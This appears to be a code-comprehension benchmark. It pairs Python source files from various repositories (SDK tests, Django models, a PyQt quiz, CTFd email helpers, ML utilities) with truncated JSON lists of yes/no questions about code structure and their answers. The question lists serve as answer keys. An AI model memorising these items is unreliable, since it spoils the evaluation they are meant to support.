# model = isi_sdk_9_0_0.models.network_pools.NetworkPools() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | isi_sdk_9_0_0/test/test_network_pools.py | mohitjain97/isilon_sdk_python |
import graphene
from graphene import relay
from ....product import models
from ...core.connection import CountableDjangoObjectType
from ...core.scalars import UUID
from ...meta.types import ObjectWithMetadata
class DigitalContentUrl(CountableDjangoObjectType):
url = graphene.String(description="URL for digital content.")
token = graphene.Field(
UUID, description=("UUID of digital content."), required=True
)
class Meta:
model = models.DigitalContentUrl
only_fields = ["content", "created", "download_num"]
interfaces = (relay.Node,)
@staticmethod
def resolve_url(root: models.DigitalContentUrl, *_args):
return root.get_absolute_url()
class DigitalContent(CountableDjangoObjectType):
urls = graphene.List(
lambda: DigitalContentUrl,
description="List of URLs for the digital variant.",
)
class Meta:
model = models.DigitalContent
only_fields = [
"automatic_fulfillment",
"content_file",
"max_downloads",
"product_variant",
"url_valid_days",
"urls",
"use_default_settings",
]
interfaces = (relay.Node, ObjectWithMetadata)
@staticmethod
def resolve_urls(root: models.DigitalContent, **_kwargs):
return root.urls.all()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": ... | 3 | saleor/graphql/product/types/digital_contents.py | shannenye/saleor |
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from polyaxon import settings
from polyaxon.logger import logger
from polyaxon.polyboard.logging import V1Log
class PolyaxonHandler(logging.Handler):
def __init__(self, send_logs, **kwargs):
self._send_logs = send_logs
logging.Handler.__init__(
self,
level=kwargs.get(
"level", settings.CLIENT_CONFIG.log_level or logging.NOTSET
),
)
def set_send_logs(self, send_logs):
self._send_logs = send_logs
def can_record(self, record):
return not (
record.name == "polyaxon"
or record.name == "polyaxon.cli"
or record.name.startswith("polyaxon")
)
def format_record(self, record):
return V1Log(value=record.msg)
def emit(self, record): # pylint:disable=inconsistent-return-statements
if settings.CLIENT_CONFIG.is_managed or not self.can_record(record):
return
try:
return self._send_logs(self.format_record(record))
except Exception:
logger.warning("Polyaxon failed creating log record")
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answ... | 3 | core/polyaxon/client/handlers/handler.py | Ohtar10/polyaxon |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2019 all rights reserved
#
"""
Verify that derived descriptors get harvested correctly
"""
def test():
# get the descriptor package
from pyre import descriptors
# get the base metaclass
from pyre.patterns.AttributeClassifier import AttributeClassifier
# first, the harvesting metaclass
class harvester(AttributeClassifier):
def __new__(cls, name, bases, attributes):
# the pile
pile = []
# harvest
for entryName, entry in cls.pyre_harvest(attributes, descriptors.stem):
# initialize
entry.bind(name=entryName)
# and add them to the pile
pile.append(entry)
# build the class record
record = super().__new__(cls, name, bases, attributes)
# attach the pile
record.pile = pile
# and return it
return record
# a new descriptor
class money(descriptors.decimal): pass
# the client
class client(metaclass=harvester):
# some descriptors
sku = descriptors.int(default=4503)
cost = money(default=2.34)
# verify that the descriptors were harvested correctly
assert [entry.name for entry in client.pile] == ['sku', 'cost']
# get the defaults
sku = client.sku.coerce(client.sku.default)
cost = client.cost.coerce(client.cost.default)
# check the default value
assert client.sku.default == 4503
assert client.cost.default == 2.34
# all done
return client
# main
if __name__ == "__main__":
# skip pyre initialization since we don't rely on the executive
pyre_noboot = True
# do...
test()
# end of file
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | tests/pyre/descriptors/inheritance.py | lijun99/pyre |
# -*- coding: utf-8 -*-
from django.db import models
from apps.accounts.models.choices import Platform
from apps.accounts.models.managers.phone_device import PhoneDeviceManager
from django.utils.translation import ugettext_lazy as _
from apps.contrib.models.mixins import UUIDPrimaryKeyModelMixin, TimeStampedModelMixin
class PhoneDevice(UUIDPrimaryKeyModelMixin, TimeStampedModelMixin):
token = models.TextField(
verbose_name=_('Device ID'),
db_index=True,
blank=True,
null=True,
)
platform = models.CharField(
choices=Platform.choices(),
max_length=10,
)
model_name = models.CharField(
max_length=50,
verbose_name=_('Model Name'),
blank=True,
null=True,
)
is_active = models.BooleanField(
verbose_name=_('Is active'),
default=True,
)
user = models.ForeignKey(
'accounts.User',
on_delete=models.CASCADE,
related_name='devices',
blank=True,
null=True,
)
objects = PhoneDeviceManager()
def __str__(self):
return '{token} - {user}'.format(
token=self.token,
user=self.user,
)
class Meta:
db_table = 'phone_devices'
verbose_name = _('Phone Device')
verbose_name_plural = _('Phone Devices')
ordering = ['created_at']
app_label = 'accounts'
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": true
},
{
... | 3 | apps/accounts/models/phone_device.py | victoraguilarc/agendas |
# Generates comments with the specified indentation and wrapping-length
def generateComment(comment, length=100, indentation=""):
out = ""
for commentChunk in [
comment[i : i + length] for i in range(0, len(comment), length)
]:
out += indentation + "// " + commentChunk + "\n"
return out
# Generates C++ pointer data references from an XML element
def getDataReference(element, root):
for parent in root.iter():
# Check to make sure parent is actually a parent of element
if element in parent:
return getDataReference(parent, root) + "->" + element.attrib["id"]
return root.attrib["id"]
def capitalize(string):
return string.capitalize()[0] + string[1:]
def getMutexReference(struct, root):
return getDataReference(struct, root) + "->" + struct.attrib["id"] + "Mutex"
def getGetReference(struct, field):
return "get" + capitalize(struct.attrib["id"]) + capitalize(field.attrib["id"])
def getSetReference(struct, field):
return "set" + capitalize(struct.attrib["id"]) + capitalize(field.attrib["id"])
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | autocoding/util.py | badgerloop-software/pod-embedded-beta |
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/carthagenet/KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5.json')
def test_storage_encoding_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | tests/storage/cases/test_KT1VwGoijY62ze1w9iTaCum7ybMyGcw2Uep5.py | juztin/pytezos-1 |
#!/usr/bin/env python
import argparse
import pdpyras
import sys
# Disables noisy warning logging from pdpyras
import logging
logging.disable(logging.WARNING)
# Get all users' contact methods.
# Originally by Ryan Hoskin
def get_users(session):
sys.stdout.write("Listing All Users' Contact Methods:\n")
for user in session.iter_all('users'):
sys.stdout.write("User: ")
sys.stdout.write(user['name'])
sys.stdout.write("\n")
get_contact_methods(user['id'], session)
sys.stdout.write("-----\n")
def get_contact_methods(user_id, session):
for contact_method in session.iter_all('users/%s/contact_methods'%user_id):
if 'phone' in contact_method['type']:
sys.stdout.write("Phone: ")
sys.stdout.write('%s %s'%(contact_method['country_code'],
contact_method['address']))
elif 'sms' in contact_method['type']:
sys.stdout.write("SMS: ")
sys.stdout.write('%s %s'%(contact_method['country_code'],
contact_method['address']))
elif 'email' in contact_method['type']:
sys.stdout.write("Email: ")
sys.stdout.write(contact_method['address'])
elif 'push_notification' in contact_method['type']:
sys.stdout.write("Push: ")
sys.stdout.write(contact_method['label'])
sys.stdout.write("\n")
if __name__ == '__main__':
ap = argparse.ArgumentParser(description="Retrieves contact info for all "
"users in a PagerDuty account")
ap.add_argument('-k', '--api-key', required=True, help="REST API key")
args = ap.parse_args()
session = pdpyras.APISession(args.api_key)
get_users(session)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than... | 3 | get_info_on_all_users/contact_methods.py | DuncanMillard/public-support-scripts |
#подключение библиотек
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel,QVBoxLayout,QHBoxLayout, QMessageBox, QRadioButton
#создание приложения и главного окна
app=QApplication([])
main_win =QWidget()
main_win.setWindowTitle('Конкурс от Crazy People')
question =QLabel("В каком году канал получил золотую кнопку от YouTube?")
btn_answer1 =QRadioButton('2005')
btn_answer2 =QRadioButton('2010')
btn_answer3 =QRadioButton('2015')
btn_answer4 =QRadioButton('2020')
layout_main=QVBoxLayout()
h1=QHBoxLayout()
h2=QHBoxLayout()
h3=QHBoxLayout()
h1.addWidget(question,alignment =Qt.AlignCenter)
h2.addWidget(btn_answer1,alignment =Qt.AlignCenter)
h2.addWidget(btn_answer2,alignment =Qt.AlignCenter)
h3.addWidget(btn_answer3,alignment =Qt.AlignCenter)
h3.addWidget(btn_answer4,alignment =Qt.AlignCenter)
layout_main.addLayout(h1)
layout_main.addLayout(h2)
layout_main.addLayout(h3)
main_win.setLayout(layout_main)
def win ():
win =QMessageBox()
win.setText('Верно!')
win.exec_()
def lose():
lose =QMessageBox()
lose.setText('«Нет, в 2015 году. Вы выиграли фирменный плакат')
lose.exec_()
btn_answer1.clicked.connect(lose)
btn_answer2.clicked.connect(lose)
btn_answer3.clicked.connect(win)
btn_answer4.clicked.connect(lose)
main_win.show()
app.exec_()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | youtube_contest.py | all0ws/cryze-peple |
from orator import Model
from orator.orm import belongs_to_many,has_many,belongs_to
from config import db
Model.set_connection_resolver(db)
class Entry(Model):
__fillable__ = ['location']
@belongs_to_many
def trans(self):
return Tran
class Tran(Model):
__fillable__ = ['name','type']
@belongs_to_many
def entries(self):
return Entry
@belongs_to_many
def trains(self):
return Train
class Train(Model):
__fillable__ = ['name']
@belongs_to_many
def trans(self):
return Tran
@has_many
def results(self):
return Result
class Result(Model):
__fillable__ = ['key','value']
@belongs_to
def trains(self):
return Train
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
... | 3 | orms.py | cliuxinxin/mukeniao2 |
import torch
from torch import nn
from torch.nn import functional as F
LAYER1_NODE = 10240
def weights_init(m):
if type(m) == nn.Conv2d:
nn.init.xavier_uniform(m.weight.data)
nn.init.constant(m.bias.data, 0.01)
class TxtModule(nn.Module):
def __init__(self, y_dim, bit):
"""
:param y_dim: dimension of tags
:param bit: bit number of the final binary code
"""
super(TxtModule, self).__init__()
self.module_name = "text_model"
# full-conv layers
self.conv1 = nn.Conv2d(1, LAYER1_NODE, kernel_size=(y_dim, 1), stride=(1, 1))
self.conv2 = nn.Conv2d(LAYER1_NODE, bit, kernel_size=1, stride=(1, 1))
self.apply(weights_init)
self.classifier = nn.Sequential(
self.conv1,
nn.ReLU(inplace=True),
nn.Dropout(),
self.conv2,
)
def forward(self, x):
x = self.classifier(x)
x = x.squeeze()
tanh = nn.Tanh()
x = tanh(x)
return x
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lin... | 3 | DCHUC/utils/txt_module.py | BMC-SDNU/Cross-Modal-Hashing-Retrieval |
# -*- coding: utf-8 -*-
# @File : XGBoostLRDataProcess.py
# @Author : Hua Guo
# @Disc :
from sklearn.preprocessing import OneHotEncoder
from sklearn.base import TransformerMixin, BaseEstimator
from xgboost.sklearn import XGBModel
from copy import deepcopy
from xgboost.sklearn import XGBClassifier
import logging
logging.getLogger(__name__)
class XGBoostLRDataProcess(TransformerMixin, BaseEstimator):
def __init__(self) -> None:
self.xgb = XGBClassifier()
self.one_hot = OneHotEncoder()
def fit(self, X, y):
X = deepcopy(X)
self.xgb.fit(
X=X, y=y
, verbose=True
, eval_metric='logloss'
# , verbose=self.xgb_train_params['verbose']
# , eval_metric=self.xgb_train_params['eval_metric']
,eval_set=[[X, y]]
)
X = self.xgb.apply(X)
self.one_hot.fit(X)
return self
def transform(self, X, y=None):
X = self.xgb.apply(X) # [:, 70:]
X = self.one_hot.transform(X)
return X
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | src/DataPreprocess/XGBoostLRDataProcess.py | xiaoye-hua/recommendation_system |
import numpy as np
import pandas as pd
class DataModel:
"""
This class implements a data model - values at time points and provides methods for working with these data.
"""
def __init__(self, n=0, values=None, times=None):
"""
A constructor that takes values and a time point.
:param values: Array of values process
:param times: Array of a time points
"""
if (values is None) or (times is None):
self._times = np.zeros((n, ))
self._values = np.zeros((n, ))
else:
if len(values) != len(times):
print("Different size of values and times")
else:
self._times = np.array(times, dtype=float)
self._values = np.array(values, dtype=float)
def print(self, n=None):
if n is not None:
_n = n
elif self._times.shape:
_n = self._times.shape[0]
for i in range(_n):
print("Time: {}___Value: {}".format(self._times[i], self._values[i]))
@property
def mean(self):
"""
:return: Mean of values
"""
return self._times.mean()
def get_values(self):
return self._values
def get_times(self):
return self._times
def add_value(self, value, index):
# self._values.__add__(value)
self._values[index] = value
def add_time(self, time, index):
# self._times.__add__(time)
self._times[index] = time
def get_value(self, index):
return self._values[index]
def get_time(self, index):
return self._times[index] | [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | model/src/DataModel.py | roman-baldaev/course-project |
from behave import *
from behave.log_capture import capture
import tempfile
import shutil
@capture()
def before_scenario(context, scenario):
context.working_directory = tempfile.mkdtemp()
# prepare some lists to store mentioned entities during steps
context.cells = []
context.files = []
context.file_contents = []
context.notebooks = []
@capture()
def after_scenario(context, scenario):
shutil.rmtree(context.working_directory) | [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | features/environment.py | alpine-data/synbconvert |
import logging
from typing import Any, Awaitable, Callable, Dict, Optional
from aiogram import BaseMiddleware
from aiogram.dispatcher.event.handler import HandlerObject
from aiogram.types import TelegramObject, User
from aiolimiter import AsyncLimiter
logger = logging.getLogger(__name__)
class ThrottlingMiddleware(BaseMiddleware):
def __init__(self, default_rate: int = 2) -> None:
self.limiters: Dict[str, AsyncLimiter] = {}
self.default_rate = default_rate
async def __call__(
self,
handler: Callable[[TelegramObject, Dict[str, Any]], Awaitable[Any]],
event: TelegramObject,
data: Dict[str, Any],
) -> Any:
user: Optional[User] = data.get("event_from_user")
# get the real handler that will be called at the end of chain
real_handler: HandlerObject = data["handler"]
# get settled throttling flags from handler
throttling_key = real_handler.flags.get("throttling_key", None)
throttling_rate = real_handler.flags.get("throttling_rate", self.default_rate)
if not throttling_key or not user:
return await handler(event, data)
limiter = self.limiters.setdefault(
f"{user.id}:{throttling_key}", AsyncLimiter(1, throttling_rate)
)
if limiter.has_capacity():
async with limiter:
return await handler(event, data)
else:
logger.info(
"Throttled for user=%d, key=%s, rate=%d",
user.id,
throttling_key,
throttling_rate,
)
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exc... | 3 | bot/middlewares/throttling.py | darksidecat/telegram-2048-bot |
"""add
Revision ID: 5edcaaadde99
Revises: a1d970c1214f
Create Date: 2019-03-18 09:41:06.484761
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5edcaaadde99'
down_revision = 'a1d970c1214f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('gender', sa.String(length=30), nullable=True))
op.add_column('user', sa.Column('language', sa.String(length=30), nullable=True))
op.add_column('user', sa.Column('signature', sa.String(length=100), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'signature')
op.drop_column('user', 'language')
op.drop_column('user', 'gender')
# ### end Alembic commands ###
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | migrations/versions/5edcaaadde99_add.py | 13460991260/shop |
from collections import namedtuple
import numpy as np
from jesse.helpers import get_candle_source, np_shift, slice_candles
AG = namedtuple('AG', ['jaw', 'teeth', 'lips'])
def alligator(candles: np.ndarray, source_type: str = "close", sequential: bool = False) -> AG:
"""
Alligator
:param candles: np.ndarray
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: AG(jaw, teeth, lips)
"""
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
jaw = np_shift(numpy_ewma(source, 13), 8, fill_value=np.nan)
teeth = np_shift(numpy_ewma(source, 8), 5, fill_value=np.nan)
lips = np_shift(numpy_ewma(source, 5), 3, fill_value=np.nan)
if sequential:
return AG(jaw, teeth, lips)
else:
return AG(jaw[-1], teeth[-1], lips[-1])
def numpy_ewma(data: np.ndarray, window: int):
"""
:param data:
:param window:
:return:
"""
alpha = 1 / window
scale = 1 / (1 - alpha)
n = data.shape[0]
scale_arr = (1 - alpha) ** (-1 * np.arange(n))
weights = (1 - alpha) ** np.arange(n)
pw0 = (1 - alpha) ** (n - 1)
mult = data * pw0 * scale_arr
cumsums = mult.cumsum()
out = cumsums * scale_arr[::-1] / weights.cumsum()
return out
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
... | 3 | jesse/indicators/alligator.py | noenfugler/jesse |
compression_methods = ['']
_blosc_methods = ['blosc-blosclz', 'blosc-lz4']
try:
import blosc
HAVE_BLOSC = True
compression_methods.extend(_blosc_methods)
except ImportError:
HAVE_BLOSC = False
def compress(data, method, *args, **kwds):
if method == '':
return data
_check_method(method)
if method.startswith('blosc-'):
kwds['cname'] = method[6:]
data = blosc.compress(data, *args, **kwds)
else:
raise ValueError("Unknown compression method '%s'" % method)
return data
def decompress(data, method, *args, **kwds):
if method == '':
return data
_check_method(method)
if method.startswith('blosc-'):
return blosc.decompress(data)
else:
raise ValueError("Unknown compression method '%s'" % method)
def _check_method(method):
if method not in compression_methods:
if method in _blosc_methods:
raise ValueError("Cannot use %s compression; blosc package is not importable." % method)
else:
raise ValueError('Unknown compression method "%s"' % method)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | pyacq/core/stream/compression.py | cimbi/pyacq |
# Everything covered in oop
class RegisterUser:
# actual class attribute
user_ref_id = 100
# class constructor | deifnes class attributes
def __init__(self, username, email, passcode):
self.username = username
self.email = email
self.passcode = passcode
# basic class method
def register_new_user(self):
return f"Hello {self.username}, your email is {self.email}"
# decorator function that allows us to use the describe_full_user func wifawt instantiation
# takes cls as an option for the self parameter
@classmethod
def describe_full_user(cls, dob, reg_date):
return f"Hello your reg_date is {reg_date} and dob is {dob} with passcode"
# A class method that does not depend on the class attrubutes
# Can also be used without instatiation
@staticmethod
def maximum_salary_finder(*args):
return max(args)
# instantiate basic obj
user_ = RegisterUser("kpodo", "napthanewman@gmail.com", "argentina33")
# using instattion
print(user_.register_new_user())
# @static method used without instantiation, class used directly to access method
print(RegisterUser.maximum_salary_finder(10, 390, 18, 100))
# @classmethod used similar to static method
print(RegisterUser.describe_full_user("April 6, 2020", "April 4, 2020"))
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | OOP/review.py | danielkpodo/python-zero-to-mastery |
import unittest
import numpy as np
from numba import autojit
mu = 0.1
Lx, Ly = 101, 101
@autojit
def diffusionObstacleStep(u,tempU,iterNum):
for n in range(iterNum):
for i in range(1, Lx - 1):
for j in range(1, Ly - 1):
u[i,j] = mu * (tempU[i+1,j]-2*tempU[i,j]+tempU[i-1,j] +
tempU[i,j+1]-2*tempU[i,j]+tempU[i,j-1])
# Bug in Meta??
# tempU, u = u, tempU
# -> Assign(targets=[Name(id='tempU', ctx=Store()),
# Name(id='u', ctx=Store())],
# value=Name(id='u', ctx=Load()))
temp = u
u = tempU
tempU = temp
def get_arrays():
u = np.zeros([Lx, Ly], dtype=np.float64)
tempU = np.zeros([Lx, Ly], dtype=np.float64)
u[Lx / 2, Ly / 2] = 1000.0
return tempU, u
def test_diffusion():
tempU, u = get_arrays()
iterNum = 10
diffusionObstacleStep(u, tempU, iterNum)
tempU_numpy, u_numpy = get_arrays()
diffusionObstacleStep.py_func(u_numpy, tempU_numpy, iterNum)
print(u)
print(u_numpy)
assert np.allclose(u, u_numpy)
if __name__ == "__main__":
test_diffusion()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | numba/tests/test_diffusion.py | liuzhenhai/numba |
from flask import current_app as app, url_for
from CTFd.utils import get_config, get_app_config
from CTFd.utils.config import get_mail_provider, mailserver
from CTFd.utils.email import mailgun, smtp
from CTFd.utils.security.signing import serialize
import re
EMAIL_REGEX = r"(^[^@\s]+@[^@\s]+\.[^@\s]+$)"
def sendmail(addr, text):
provider = get_mail_provider()
if provider == 'smtp':
return smtp.sendmail(addr, text)
if provider == 'mailgun':
return mailgun.sendmail(addr, text)
return False, "No mail settings configured"
def forgot_password(email, team_name):
token = serialize(team_name)
text = """Did you initiate a password reset? Click the following link to reset your password:
{0}/{1}
""".format(url_for('auth.reset_password', _external=True), token)
sendmail(email, text)
def verify_email_address(addr):
token = serialize(addr)
text = """Please click the following link to confirm your email address for {ctf_name}: {url}/{token}""".format(
ctf_name=get_config('ctf_name'),
url=url_for('auth.confirm', _external=True),
token=token
)
sendmail(addr, text)
def check_email_format(email):
return bool(re.match(EMAIL_REGEX, email))
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answ... | 3 | CTFd/utils/email/__init__.py | ramadistra/CTFd |
import os
from step_project.utils.import_methods import import_pygraphviz
from common_utils.file_utils import get_settings
def create_project_graph(project, output_filename='project_graph'):
# Nodes
nodes = []
edges = []
for d in sorted(os.listdir('.')):
if os.path.isdir(d) and os.path.isfile(os.path.join(d, 'description.yml')):
step = project.read_step(d, no_check=True)
node = step.directory
label = node if step.is_completed() else '* ' + node
nodes.append((node, dict(label=label)))
#
prev_steps = step._step_data['prev_steps']
if prev_steps:
command = step._step_data['command']
edges.extend((p, node, dict(label=command)) for p in prev_steps)
create_graph_from_data(nodes, edges, output_filename)
def create_graph_from_data(nodes, edges, output_filename):
pygraphviz = import_pygraphviz()
attrs = dict(strict=True, directed=True)
if len(nodes) > 10:
attrs['rankdir'] = 'LR'
graph = pygraphviz.AGraph(**attrs)
# graph.graph_attr['rankdir'] = 'LR' # Orientation left-right
# graph.node_attr['shape'] = 'plaintext'
# graph.node_attr['shape'] = 'record'
# graph.edge_attr['lblstyle'] = 'above, sloped'
for node, attrs in nodes:
graph.add_node(node, **attrs)
# Edges
for from_node, to_node, attrs in edges:
graph.add_edge(from_node, to_node, **attrs)
# Export
graph.write(output_filename + '.dot')
# prog=neato|dot|twopi|circo|fdp|nop
ps_file = output_filename + '.ps'
graph.draw(ps_file, prog='dot')
ps_viewer = get_settings()['ps_viewer']
if ps_viewer:
os.system(f"{ps_viewer} {ps_file}")
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | step_project/common/graph/project_graph.py | CroP-BioDiv/zcitools |
import numpy as np
from cobras_ts.superinstance import SuperInstance
def get_prototype(A,indices):
max_affinity_to_others = -np.inf
prototype_idx = None
for idx in indices:
affinity_to_others = 0.0
for j in indices:
if j == idx:
continue
affinity_to_others += A[idx,j]
if affinity_to_others > max_affinity_to_others:
prototype_idx = idx
max_affinity_to_others = affinity_to_others
return prototype_idx
class SuperInstance_DTW(SuperInstance):
def __init__(self, data, indices, train_indices, parent=None):
"""
Chooses the super-instance representative based on the affinity matrix under the data argument
"""
super(SuperInstance_DTW, self).__init__(data, indices, train_indices, parent)
self.representative_idx = get_prototype(self.data, self.train_indices)
def distance_to(self, other_superinstance):
"""
Uses the negative entry in the affinity matrix between the two super-instance representatives
note: this is not a correct distance measure but this is not necessary for COBRAS
"""
# not really a distance, but that does not matter for COBRAS execution, this is only used for sorting etc.
return -self.data[self.representative_idx, other_superinstance.representative_idx]
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | cobras_ts/superinstance_dtw.py | Pica4x6/cobras |
from PyQt5.Qt import QMainWindow, QTabWidget, QAction
from pyqt_sql_demo.widgets.connection import ConnectionWidget
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setMinimumWidth(640)
self.setMinimumHeight(480)
# Set up QTabWidget as a central widget
self.tab_widget = QTabWidget(self)
self.tab_widget.setTabsClosable(True)
self.tab_widget.tabCloseRequested.connect(self.on_tab_close_clicked)
self.setCentralWidget(self.tab_widget)
# Create "Connection" menu
menu_bar = self.menuBar()
connection_menu = menu_bar.addMenu("Connection")
# Add "Create" connection button
create_connection_action = QAction("Create", self)
create_connection_action.triggered.connect(self.add_new_tab)
connection_menu.addAction(create_connection_action)
# Add "Close" connection button
close_connection_action = QAction("Close", self)
close_connection_action.triggered.connect(self.close_current_tab)
connection_menu.addAction(close_connection_action)
# self.tool_bar = self.addToolBar('test bar')
# self.connect_action = self.tool_bar.addAction('connect')
self.add_new_tab()
def add_new_tab(self):
connection_widget = ConnectionWidget(self.tab_widget)
connection_widget.title_changed.connect(self.on_tab_name_changed)
self.tab_widget.addTab(connection_widget, "Untitled")
def close_current_tab(self):
idx = self.tab_widget.currentIndex()
self.tab_widget.removeTab(idx)
def on_tab_close_clicked(self, idx):
self.tab_widget.removeTab(idx)
def on_tab_name_changed(self, widget, name):
idx = self.tab_widget.indexOf(widget)
if idx != -1:
self.tab_widget.setTabText(idx, name)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | pyqt_sql_demo/widgets/main.py | nshiell/pyqt-sql-demo |
# Copyright (c) 2018 StackHPC Ltd.
#
